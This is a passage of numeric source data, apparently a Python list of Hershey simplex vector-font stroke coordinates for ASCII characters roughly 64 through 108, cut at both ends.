17, 6,19, 5,21, 5,23, 7,24,10,24,12,23,15,22,17,20,19,18,20,15,21,12,
21, 9,20, 7,19, 5,17, 4,15, 3,12, 3, 9, 4, 6, 5, 4, 7, 2, 9, 1,12, 0,
15, 0,18, 1,20, 2,21, 3,-1,-1,19,16,18, 8,18, 6,19, 5],
[8,18, # Ascii 65
9,21, 1, 0,-1,-1, 9,21,17, 0,-1,-1, 4, 7,14, 7,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[23,21, # Ascii 66
4,21, 4, 0,-1,-1, 4,21,13,21,16,20,17,19,18,17,18,15,17,13,16,12,13,
11,-1,-1, 4,11,13,11,16,10,17, 9,18, 7,18, 4,17, 2,16, 1,13, 0, 4, 0,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[18,21, # Ascii 67
18,16,17,18,15,20,13,21, 9,21, 7,20, 5,18, 4,16, 3,13, 3, 8, 4, 5, 5,
3, 7, 1, 9, 0,13, 0,15, 1,17, 3,18, 5,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[15,21, # Ascii 68
4,21, 4, 0,-1,-1, 4,21,11,21,14,20,16,18,17,16,18,13,18, 8,17, 5,16,
3,14, 1,11, 0, 4, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[11,19, # Ascii 69
4,21, 4, 0,-1,-1, 4,21,17,21,-1,-1, 4,11,12,11,-1,-1, 4, 0,17, 0,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,18, # Ascii 70
4,21, 4, 0,-1,-1, 4,21,17,21,-1,-1, 4,11,12,11,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[22,21, # Ascii 71
18,16,17,18,15,20,13,21, 9,21, 7,20, 5,18, 4,16, 3,13, 3, 8, 4, 5, 5,
3, 7, 1, 9, 0,13, 0,15, 1,17, 3,18, 5,18, 8,-1,-1,13, 8,18, 8,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,22, # Ascii 72
4,21, 4, 0,-1,-1,18,21,18, 0,-1,-1, 4,11,18,11,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[2, 8, # Ascii 73
4,21, 4, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[10,16, # Ascii 74
12,21,12, 5,11, 2,10, 1, 8, 0, 6, 0, 4, 1, 3, 2, 2, 5, 2, 7,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,21, # Ascii 75
4,21, 4, 0,-1,-1,18,21, 4, 7,-1,-1, 9,12,18, 0,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,17, # Ascii 76
4,21, 4, 0,-1,-1, 4, 0,16, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[11,24, # Ascii 77
4,21, 4, 0,-1,-1, 4,21,12, 0,-1,-1,20,21,12, 0,-1,-1,20,21,20, 0,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,22, # Ascii 78
4,21, 4, 0,-1,-1, 4,21,18, 0,-1,-1,18,21,18, 0,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[21,22, # Ascii 79
9,21, 7,20, 5,18, 4,16, 3,13, 3, 8, 4, 5, 5, 3, 7, 1, 9, 0,13, 0,15,
1,17, 3,18, 5,19, 8,19,13,18,16,17,18,15,20,13,21, 9,21,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[13,21, # Ascii 80
4,21, 4, 0,-1,-1, 4,21,13,21,16,20,17,19,18,17,18,14,17,12,16,11,13,
10, 4,10,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[24,22, # Ascii 81
9,21, 7,20, 5,18, 4,16, 3,13, 3, 8, 4, 5, 5, 3, 7, 1, 9, 0,13, 0,15,
1,17, 3,18, 5,19, 8,19,13,18,16,17,18,15,20,13,21, 9,21,-1,-1,12, 4,
18,-2,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[16,21, # Ascii 82
4,21, 4, 0,-1,-1, 4,21,13,21,16,20,17,19,18,17,18,15,17,13,16,12,13,
11, 4,11,-1,-1,11,11,18, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[20,20, # Ascii 83
17,18,15,20,12,21, 8,21, 5,20, 3,18, 3,16, 4,14, 5,13, 7,12,13,10,15,
9,16, 8,17, 6,17, 3,15, 1,12, 0, 8, 0, 5, 1, 3, 3,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,16, # Ascii 84
8,21, 8, 0,-1,-1, 1,21,15,21,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[10,22, # Ascii 85
4,21, 4, 6, 5, 3, 7, 1,10, 0,12, 0,15, 1,17, 3,18, 6,18,21,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,18, # Ascii 86
1,21, 9, 0,-1,-1,17,21, 9, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[11,24, # Ascii 87
2,21, 7, 0,-1,-1,12,21, 7, 0,-1,-1,12,21,17, 0,-1,-1,22,21,17, 0,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,20, # Ascii 88
3,21,17, 0,-1,-1,17,21, 3, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[6,18, # Ascii 89
1,21, 9,11, 9, 0,-1,-1,17,21, 9,11,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,20, # Ascii 90
17,21, 3, 0,-1,-1, 3,21,17,21,-1,-1, 3, 0,17, 0,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[11,14, # Ascii 91
4,25, 4,-7,-1,-1, 5,25, 5,-7,-1,-1, 4,25,11,25,-1,-1, 4,-7,11,-7,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[2,14, # Ascii 92
0,21,14,-3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[11,14, # Ascii 93
9,25, 9,-7,-1,-1,10,25,10,-7,-1,-1, 3,25,10,25,-1,-1, 3,-7,10,-7,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[10,16, # Ascii 94
6,15, 8,18,10,15,-1,-1, 3,12, 8,17,13,12,-1,-1, 8,17, 8, 0,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[2,16, # Ascii 95
0,-2,16,-2,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[7,10, # Ascii 96
6,21, 5,20, 4,18, 4,16, 5,15, 6,16, 5,17,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,19, # Ascii 97
15,14,15, 0,-1,-1,15,11,13,13,11,14, 8,14, 6,13, 4,11, 3, 8, 3, 6, 4,
3, 6, 1, 8, 0,11, 0,13, 1,15, 3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,19, # Ascii 98
4,21, 4, 0,-1,-1, 4,11, 6,13, 8,14,11,14,13,13,15,11,16, 8,16, 6,15,
3,13, 1,11, 0, 8, 0, 6, 1, 4, 3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[14,18, # Ascii 99
15,11,13,13,11,14, 8,14, 6,13, 4,11, 3, 8, 3, 6, 4, 3, 6, 1, 8, 0,11,
0,13, 1,15, 3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,19, # Ascii 100
15,21,15, 0,-1,-1,15,11,13,13,11,14, 8,14, 6,13, 4,11, 3, 8, 3, 6, 4,
3, 6, 1, 8, 0,11, 0,13, 1,15, 3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,18, # Ascii 101
3, 8,15, 8,15,10,14,12,13,13,11,14, 8,14, 6,13, 4,11, 3, 8, 3, 6, 4,
3, 6, 1, 8, 0,11, 0,13, 1,15, 3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,12, # Ascii 102
10,21, 8,21, 6,20, 5,17, 5, 0,-1,-1, 2,14, 9,14,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[22,19, # Ascii 103
15,14,15,-2,14,-5,13,-6,11,-7, 8,-7, 6,-6,-1,-1,15,11,13,13,11,14, 8,
14, 6,13, 4,11, 3, 8, 3, 6, 4, 3, 6, 1, 8, 0,11, 0,13, 1,15, 3,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[10,19, # Ascii 104
4,21, 4, 0,-1,-1, 4,10, 7,13, 9,14,12,14,14,13,15,10,15, 0,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8, 8, # Ascii 105
3,21, 4,20, 5,21, 4,22, 3,21,-1,-1, 4,14, 4, 0,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[11,10, # Ascii 106
5,21, 6,20, 7,21, 6,22, 5,21,-1,-1, 6,14, 6,-3, 5,-6, 3,-7, 1,-7,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,17, # Ascii 107
4,21, 4, 0,-1,-1,14,14, 4, 4,-1,-1, 8, 8,15, 0,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[2, 8, # Ascii 108
4,21, 4, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
